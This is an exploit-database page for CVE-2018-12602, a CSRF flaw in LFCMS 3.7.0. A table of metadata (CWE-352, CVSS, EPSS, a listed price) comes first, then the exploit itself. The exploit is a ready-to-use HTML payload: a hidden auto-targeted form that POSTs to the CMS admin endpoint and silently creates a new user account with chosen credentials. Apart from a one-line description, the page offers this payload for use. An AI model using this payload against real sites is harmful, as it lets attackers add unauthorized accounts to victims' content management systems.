Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2018-12602 | CWE-352 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2018-06-22 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L | 0.2634 | 0.78937 |
# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily. # Date: 2018-06-20 # Exploit Author: bay0net # Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203740.html # Software Link: http://www.lfdycms.com/home/down/index/id/26.html # Version: 3.7.0 # CVE : CVE-2018-12602 A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily. The payload for attack is as follows. <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Users/add.html" method="POST"> <input type="hidden" name="username" value="test222" /> <input type="hidden" name="email" value="[email protected]" /> <input type="hidden" name="password" value="test222" /> <input type="hidden" name="repassword" value="test222" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.